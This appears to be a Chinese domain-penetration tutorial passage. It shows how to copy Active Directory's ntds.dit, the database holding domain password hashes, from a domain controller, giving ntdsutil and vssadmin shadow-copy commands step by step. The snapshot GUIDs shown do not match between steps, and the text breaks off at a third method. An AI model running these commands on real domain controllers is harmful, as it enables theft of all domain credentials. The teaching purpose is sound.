域渗透-域控安全

在通常情况下、即使拥有管理员权限,也无法读取域控制器中的C:\Windwos\NTDS\ntds.dit文件(活动目录始终访问这个文件，所以文件被禁止读取)。使用Windows本地卷影拷贝服务可以获得文件的副本。

卷影拷贝服务提取NTDS

在活动目录中,所有的数据都保存在ntds.dit文件中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%ntds\ntds.dit。ntds.dit 中包含(但不限于)用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样，是被Windows操作系统锁定的。在一般情况下,系统运维人员会利用卷影拷贝服务（Volume Shadow Copy Service, VSS）实现这些操作。VSS本质上属快照（Snapshot)技术的一种，主要用于备份和恢复（即使目标文件处于锁定状态）。

一：Ntds的提取

1.1：Ntdsutil.exe提取

ntdsutil.exe是一个为活动目录提供管理机制的命令行工具。使用 ntdsutil.exe,可以维护和管理活动目录数据库、控制单个主机操作、创建应用程序目录分区、删除由未使用活动目录安装向导(DCPromo.exe）成功降级的域控制器留下的元数据等。该工具默认安装在域控制器上、可以在域控制器上直接操作，也可以通过域内机器在域控制器上远程操作。ntdsutil.exe支持的操作系统有 Windows Server 2003、 Windows Server 2008、 Windows Server 2012。

实验一：Ntdsutil提取Ntds.dit

步骤一：在域控制器的命令行环境中创建一个快照。该快照包含Windows的所有文件，且在复制文件时不会受到Windows锁定机制的限制。

1 ntdsutil snapshot "activate instance ntds" create quit quit

可以看到，创建了一个GUID为{67d45168-4e4a-4b39-bc80-385d9f493dd3}的快照。

步骤二：加载创建的快照

1 ntdsutil snapshot "mount {c4c25fa3-510b-4ae7-92b9-a29c68c49d0f}" quit quit

步骤三：复制快照中的文件

1 copy C:\$SNAP_202012281442_VOLUMEC$\Windows\NTDS\ntds.dit C:\Users\Public

步骤四：卸载之前加载的快照并删除

1 ntdsutil snapshot "unmount {c4c25fa3-510b-4ae7-92b9-a29c68c49d0f}" "delete {c4c25fa3-510b-4ae7-92b9-a29c68c49d0f}" quit quit

步骤五：查询当前快照

1 ntdsutil snapshot "List All" quit quit

1.2：Vssadminn.exe提取

vssadminn是 Windows Server 2008 & Windows 7提供的VSS管理工具，可用于创建和删除卷影拷贝、列出卷影拷贝的信息（只能管理系统 Provider创建的卷影拷贝)、显示已安装的所有卷影拷贝写入程序（writers)和提供程序（providers),以及改变卷影拷贝的存储空间(即所谓的“diff空间”)的大小等。vssadminn 的操作流程和ntdsutil类似。

实验二：Vssadminn提取Ntds.dit

步骤一：在域控制器中打开命令行环境,输入如下命令，创建一个C盘的卷影拷贝

1 vssadmin create shadow /for=c:

步骤二：在创建的卷影拷贝中将ntds.dit 复制出来

1 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit c:\ntds.dit
2 dir c:\ | findstr "ntds"

步骤三：删除快照

1 vssadmin delete shadows /for=c: /quiet

1.3：Vssown.vbs提取

vssown.v